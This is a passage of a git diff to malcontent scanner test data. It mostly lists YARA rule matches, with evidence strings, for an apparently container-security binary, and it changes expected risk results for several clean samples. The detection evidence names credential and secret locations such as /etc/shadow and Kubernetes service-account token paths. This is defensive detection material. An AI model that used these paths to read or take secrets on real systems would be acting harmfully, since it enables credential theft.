[crypto/aes](https://github.com/search?q=crypto%2Faes&type=code) | +| LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | +| LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | +| LOW | [encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | +| LOW | [encoding/json](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json.yara#encoding_json) | Supports JSON encoded objects | [encoding/json](https://github.com/search?q=encoding%2Fjson&type=code) | +| LOW | [encoding/json/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [json.Unmarshal](https://github.com/search?q=json.Unmarshal&type=code) | +| LOW | [encoding/json/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json-encode.yara#JSONEncode) | encodes JSON | [MarshalJSON](https://github.com/search?q=MarshalJSON&type=code) | +| LOW | [env/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [env/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TEMP.yara#tmpdir) | tmpdir | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [env/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | +| LOW | [env/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [env/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [Rmdir](https://github.com/search?q=Rmdir&type=code)
[rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code)
[os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate](https://github.com/search?q=ftruncate&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-write.yara#file_write) | writes to file | [writeRawFile](https://github.com/search?q=writeRawFile&type=code) | +| LOW | [fs/link/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat) | May create hard file links | [linkat](https://github.com/search?q=linkat&type=code) | +| LOW | [fs/link/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | +| LOW | [fs/loopback](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/loopback.yara#loopback) | uses loopback pseudo-device files | [/dev/loop](https://github.com/search?q=%2Fdev%2Floop&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | +| LOW | [fs/node/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | +| LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | +| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir-create.yara#mkdtemp) | creates temporary directory | [temp dir](https://github.com/search?q=temp+dir&type=code) | +| LOW | [fs/tempfile/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [ioutil/tempfile](https://github.com/search?q=ioutil%2Ftempfile&type=code) | +| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | +| LOW | [hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | +| LOW | [kernel/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/acct.yara#acct) | switch process accounting on or off | [radius-acct](https://github.com/search?q=radius-acct&type=code) | +| LOW | [kernel/cpu/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | +| LOW | [kernel/hostname/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/hostname-get.yara#gethostname) | [get computer host 
name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | +| LOW | [kernel/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | +| LOW | [kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | +| LOW | [kernel/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | +| LOW | [kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | +| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code)
[SetEDNS0](https://github.com/search?q=SetEDNS0&type=code)
[dnsmessage](https://github.com/search?q=dnsmessage&type=code) | +| LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/grpc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/grpc.yara#grpc) | Uses the gRPC Remote Procedure Call framework | [gRPC](https://github.com/search?q=gRPC&type=code) | +| LOW | [net/hostname/resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/hostname-resolve.yara#cannot_resolve) | resolve network host name to IP address | [cannot resolve](https://github.com/search?q=cannot+resolve&type=code) | +| LOW | [net/http/accept/encoding](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-accept-encoding.yara#content_type) | [set HTTP response encoding format (example: gzip)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Encoding) | [Accept-Encoding](https://github.com/search?q=Accept-Encoding&type=code) | +| LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-auth.yara#http_auth) | makes HTTP requests with basic authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[Www-Authenticate](https://github.com/search?q=Www-Authenticate&type=code)
[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code) | +| LOW | [net/http2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | +| LOW | [net/http_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http_proxy.yara#proxy_auth) | [use HTTP proxy that requires authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Proxy-Authorization) | [Proxy-Authorization](https://github.com/search?q=Proxy-Authorization&type=code) | +| LOW | [net/ip/send/unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | +| LOW | [net/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code)
[syscall.Sendfile](https://github.com/search?q=syscall.Sendfile&type=code) | +| LOW | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/local/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-local-address.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvfrom](https://github.com/search?q=recvfrom&type=code)
[recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/udp/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp-receive.yara#udp_listen) | Listens for UDP responses | [ReadFromUDP](https://github.com/search?q=ReadFromUDP&type=code)
[listenUDP](https://github.com/search?q=listenUDP&type=code) | +| LOW | [net/udp/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp-send.yara#udp_send) | Sends UDP packets | [DialUDP](https://github.com/search?q=DialUDP&type=code)
[WriteMsgUDP](https://github.com/search?q=WriteMsgUDP&type=code) | +| LOW | [net/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url.yara#url_handle) | Handles URL strings | [RequestURI](https://github.com/search?q=RequestURI&type=code) | +| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd](https://github.com/search?q=cd&type=code) | +| LOW | [process/groupid/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real, effective, and saved group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | +| LOW | [process/groups/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [process/namespace/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/namespace-set.yara#setns) | associate thread or process with a namespace | [setns](https://github.com/search?q=setns&type=code) | +| LOW | [process/userid/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| LOW | [ref/path/bin/su](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/bin-su.yara#bin_su) | Calls /bin/su | [/bin/su](https://github.com/search?q=%2Fbin%2Fsu&type=code) | +| LOW | 
[ref/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc.yara#etc_path) | path reference within /etc | [/etc/apache/mime.typeshpack](https://github.com/search?q=%2Fetc%2Fapache%2Fmime.typeshpack&type=code)
[/etc/centos-release/etc/debian](https://github.com/search?q=%2Fetc%2Fcentos-release%2Fetc%2Fdebian&type=code)
[/etc/crio/crio.conf.d/](https://github.com/search?q=%2Fetc%2Fcrio%2Fcrio.conf.d%2F&type=code)
[/etc/crio/crio.conf/run/containerd/co](https://github.com/search?q=%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fcontainerd%2Fco&type=code)
[/etc/groupmemory.max](https://github.com/search?q=%2Fetc%2Fgroupmemory.max&type=code)
[/etc/hostnamecri](https://github.com/search?q=%2Fetc%2Fhostnamecri&type=code)
[/etc/hostnameusr/lib/os-releaseetc/ce](https://github.com/search?q=%2Fetc%2Fhostnameusr%2Flib%2Fos-releaseetc%2Fce&type=code)
[/etc/hostsrt](https://github.com/search?q=%2Fetc%2Fhostsrt&type=code)
[/etc/httpd/conf/mime.typesid](https://github.com/search?q=%2Fetc%2Fhttpd%2Fconf%2Fmime.typesid&type=code)
[/etc/localtime](https://github.com/search?q=%2Fetc%2Flocaltime&type=code)
[/etc/login.defs/proc/](https://github.com/search?q=%2Fetc%2Flogin.defs%2Fproc%2F&type=code)
[/etc/mime.types](https://github.com/search?q=%2Fetc%2Fmime.types&type=code)
[/etc/mtablowerdir](https://github.com/search?q=%2Fetc%2Fmtablowerdir&type=code)
[/etc/neuvector/certs/internal/ca.cert](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fca.cert&type=code)
[/etc/neuvector/certs/internal/cert.ke](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fcert.ke&type=code)
[/etc/neuvector/certs/internal/cert.pe](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fcert.pe&type=code)
[/etc/neuvector/certs/internalcom.dock](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternalcom.dock&type=code)
[/etc/nsswitch.confinvalid](https://github.com/search?q=%2Fetc%2Fnsswitch.confinvalid&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/passwd/etc/shadow](https://github.com/search?q=%2Fetc%2Fpasswd%2Fetc%2Fshadow&type=code)
[/etc/pki/ca-trust/extracted/pem/tls-c](https://github.com/search?q=%2Fetc%2Fpki%2Fca-trust%2Fextracted%2Fpem%2Ftls-c&type=code)
[/etc/pki/tls/cacert.peminvalid](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcacert.peminvalid&type=code)
[/etc/pki/tls/certs/ca-bundle.crtx](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcerts%2Fca-bundle.crtx&type=code)
[/etc/protocolsunknown](https://github.com/search?q=%2Fetc%2Fprotocolsunknown&type=code)
[/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code)
[/etc/services](https://github.com/search?q=%2Fetc%2Fservices&type=code)
[/etc/shellssubmissionsnil](https://github.com/search?q=%2Fetc%2Fshellssubmissionsnil&type=code)
[/etc/ssl/ca-bundle.pemx](https://github.com/search?q=%2Fetc%2Fssl%2Fca-bundle.pemx&type=code)
[/etc/ssl/cert.peminvalid](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.peminvalid&type=code)
[/etc/ssl/certs/ca-certificates.crtadd](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2Fca-certificates.crtadd&type=code)
[/etc/subgid](https://github.com/search?q=%2Fetc%2Fsubgid&type=code)
[/etc/subuid](https://github.com/search?q=%2Fetc%2Fsubuid&type=code)
[/etc/sysconfig/clock/](https://github.com/search?q=%2Fetc%2Fsysconfig%2Fclock%2F&type=code)
[/etc/timezone/dev/.udev/db](https://github.com/search?q=%2Fetc%2Ftimezone%2Fdev%2F.udev%2Fdb&type=code)
[/etc/zoneinfoparsing](https://github.com/search?q=%2Fetc%2Fzoneinfoparsing&type=code) | +| LOW | [ref/path/etc/resolv.conf](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc-resolv.conf.yara#etc_resolv_conf) | accesses DNS resolver configuration | [/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code) | +| LOW | [ref/path/usr/bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/calico-nodePROC](https://github.com/search?q=%2Fusr%2Fbin%2Fcalico-nodePROC&type=code)
[/usr/bin/csp-billing-adapterio.kubernetes.container.namecannot](https://github.com/search?q=%2Fusr%2Fbin%2Fcsp-billing-adapterio.kubernetes.container.namecannot&type=code)
[/usr/bin/getconf/usr/bin/timeoutcontext](https://github.com/search?q=%2Fusr%2Fbin%2Fgetconf%2Fusr%2Fbin%2Ftimeoutcontext&type=code)
[/usr/bin/getentduplicated](https://github.com/search?q=%2Fusr%2Fbin%2Fgetentduplicated&type=code)
[/usr/bin/jqsupervisord.WithCancelgrpc.Servershort](https://github.com/search?q=%2Fusr%2Fbin%2Fjqsupervisord.WithCancelgrpc.Servershort&type=code)
[/usr/bin/lsof/usr/bin/curliptables-savegraceful_stop](https://github.com/search?q=%2Fusr%2Fbin%2Flsof%2Fusr%2Fbin%2Fcurliptables-savegraceful_stop&type=code)
[/usr/bin/pod/sbin/sysctl/usr/bin/topconfigure.shcontext.TODOcontent-type/](https://github.com/search?q=%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcontent-type%2F&type=code)
[/usr/bin/supervisordAdd](https://github.com/search?q=%2Fusr%2Fbin%2FsupervisordAdd&type=code)
[/usr/bin/tee/usr/bin/pod/sbin/sysctl/usr/bin/topconfigure.shcontext.TODOc](https://github.com/search?q=%2Fusr%2Fbin%2Ftee%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOc&type=code)
[/usr/bin/topconfigure.shcontext.TODOcontent-type/dev/urandomshort](https://github.com/search?q=%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcontent-type%2Fdev%2Furandomshort&type=code)
[/usr/bin/uname/usr/bin/iconvPROC](https://github.com/search?q=%2Fusr%2Fbin%2Funame%2Fusr%2Fbin%2FiconvPROC&type=code) | +| LOW | [ref/path/usr/sbin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-sbin.yara#usr_sbin_path) | path reference within /usr/sbin | [/usr/sbin/ethtool/usr/local/bin/dpexiting](https://github.com/search?q=%2Fusr%2Fsbin%2Fethtool%2Fusr%2Flocal%2Fbin%2Fdpexiting&type=code) | +| LOW | [ref/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var.yara#var_path) | path reference within /var | [/var//sbinpInfo/rootSwarmD.2.5D.2.7D.3.1D.3.2D.3.3D.3.4D.3.5D.3.6D.3.](https://github.com/search?q=%2Fvar%2F%2FsbinpInfo%2FrootSwarmD.2.5D.2.7D.3.1D.3.2D.3.3D.3.4D.3.5D.3.6D.3.&type=code)
[/var/lib/docker/aufs/diffno](https://github.com/search?q=%2Fvar%2Flib%2Fdocker%2Faufs%2Fdiffno&type=code)
[/var/lib/rpm/Packages/lib/apk/db/installedFMON](https://github.com/search?q=%2Fvar%2Flib%2Frpm%2FPackages%2Flib%2Fapk%2Fdb%2FinstalledFMON&type=code)
[/var/nv_debug/pcap/controller](https://github.com/search?q=%2Fvar%2Fnv_debug%2Fpcap%2Fcontroller&type=code)
[/var/nv_debug/profileCannot](https://github.com/search?q=%2Fvar%2Fnv_debug%2FprofileCannot&type=code)
[/var/nv_debug/snapshotNeuVectorPolicyVersionGRP](https://github.com/search?q=%2Fvar%2Fnv_debug%2FsnapshotNeuVectorPolicyVersionGRP&type=code)
[/var/run/cri-dockerd.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcri-dockerd.sockFile&type=code)
[/var/run/crio/crio.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2Fcrio.sockFile&type=code)
[/var/run/docker.sock/var/lib/dpkg/statusFile](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2Fvar%2Flib%2Fdpkg%2FstatusFile&type=code)
[/var/run/dockershim.sock/var/lib/rpm/Packages.dbFMON](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2Fvar%2Flib%2Frpm%2FPackages.dbFMON&type=code)
[/var/run/openvswitch/Error](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2FError&type=code)
[/var/run/openvswitch/db.sockNotify](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2Fdb.sockNotify&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/ca.crtk8s.io.apimachine](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Fca.crtk8s.io.apimachine&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/namespaceproto](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Fnamespaceproto&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/tokenk8s.io.apimachiner](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftokenk8s.io.apimachiner&type=code)
[/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | +| LOW | [ref/site/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url) | contains embedded HTTPS URLs | [https://bugs.centos.org/](https://bugs.centos.org/)
[https://docker.io/](https://docker.io/)
[https://finishedmemLimitplatform](https://finishedmemLimitplatform)
[https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv](https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv)
[https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md](https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md)
[https://golang.org/pkg/unicode/](https://golang.org/pkg/unicode/)
[https://index.docker.io/json](https://index.docker.io/json)
[https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o](https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o)
[https://kubernetes.default/version/openshiftproto](https://kubernetes.default/version/openshiftproto)
[https://kubernetes.default/versionproto](https://kubernetes.default/versionproto)
[https://kubernetes.io/docs/reference/using-api/api-concepts/](https://kubernetes.io/docs/reference/using-api/api-concepts/)
[https://protobuf.dev/reference/go/faq](https://protobuf.dev/reference/go/faq)
[https://registry-1.docker.io/bufio.Scanner](https://registry-1.docker.io/bufio.Scanner)
[https://registry.hub.docker.com/Failed](https://registry.hub.docker.com/Failed)
[https://www.centos.org/](https://www.centos.org/)
[https://www.iana.org/assignments/service-names-port-numbers/service-names](https://www.iana.org/assignments/service-names-port-numbers/service-names) | +| LOW | [ref/words/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/password.yara#password) | references a 'password' | [GetPassword](https://github.com/search?q=GetPassword&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[UserPassword](https://github.com/search?q=UserPassword&type=code)
[d for field Passwordruntime](https://github.com/search?q=d+for+field+Passwordruntime&type=code)
[no passwords used](https://github.com/search?q=no+passwords+used&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[vpasswordoffsets](https://github.com/search?q=vpasswordoffsets&type=code) | +| LOW | [ref/words/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/plugin.yara#plugin) | references a 'plugin' | [PluginPidns](https://github.com/search?q=PluginPidns&type=code)
[Plugincontainerd](https://github.com/search?q=Plugincontainerd&type=code)
[PluginsRequest](https://github.com/search?q=PluginsRequest&type=code)
[PluginsResponseproto](https://github.com/search?q=PluginsResponseproto&type=code)
[Plugins_Handler](https://github.com/search?q=Plugins_Handler&type=code)
[Pluginscontainerd](https://github.com/search?q=Pluginscontainerd&type=code)
[Pluginsproto](https://github.com/search?q=Pluginsproto&type=code)
[adaptPlugin](https://github.com/search?q=adaptPlugin&type=code)
[getPlugins](https://github.com/search?q=getPlugins&type=code)
[pluginCache](https://github.com/search?q=pluginCache&type=code)
[pluginpath](https://github.com/search?q=pluginpath&type=code)
[pluginsFA](https://github.com/search?q=pluginsFA&type=code)
[pluginsToPB](https://github.com/search?q=pluginsToPB&type=code)
[s plugingithub](https://github.com/search?q=s+plugingithub&type=code)
[vplugin](https://github.com/search?q=vplugin&type=code)
[wplugin](https://github.com/search?q=wplugin&type=code) | +| LOW | [secrets/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/private_key.yara#private_key_val) | References private keys | [privateKey](https://github.com/search?q=privateKey&type=code) |
diff --git a/test_data/linux/clean/nvim.simple b/test_data/linux/clean/nvim.simple
index 7cc1dfac..1dc6fdd0 100644
--- a/test_data/linux/clean/nvim.simple
+++ b/test_data/linux/clean/nvim.simple
@@ -1,5 +1,6 @@
 # linux/clean/nvim: high
 3P/threat_hunting/hrshell: medium
+combo/degrader/linux_paths: medium
 databases/mysql: medium
 databases/sqlite: medium
 dylib/symbol/address: medium
diff --git a/test_data/linux/clean/pypi_package_index.json.simple b/test_data/linux/clean/pypi_package_index.json.simple
index c2f8ba47..a295344f 100644
--- a/test_data/linux/clean/pypi_package_index.json.simple
+++ b/test_data/linux/clean/pypi_package_index.json.simple
@@ -167,7 +167,6 @@ ref/program/sshd: medium
 ref/program/sudo: medium
 ref/site/download: high
 ref/site/dyndns: medium
-ref/words/backdoor: high
 ref/words/ddos: high
 ref/words/dropper: medium
 ref/words/exploit: high
diff --git a/test_data/linux/clean/redis-server.aarch64.md b/test_data/linux/clean/redis-server.aarch64.md
index 93d52c21..7ad499ab 100644
--- a/test_data/linux/clean/redis-server.aarch64.md
+++ b/test_data/linux/clean/redis-server.aarch64.md
@@ -1,50 +1,50 @@ -## linux/clean/redis-server.aarch64 [⚠️ MEDIUM] +## linux/clean/redis-server.aarch64 [🔥 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|---------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | 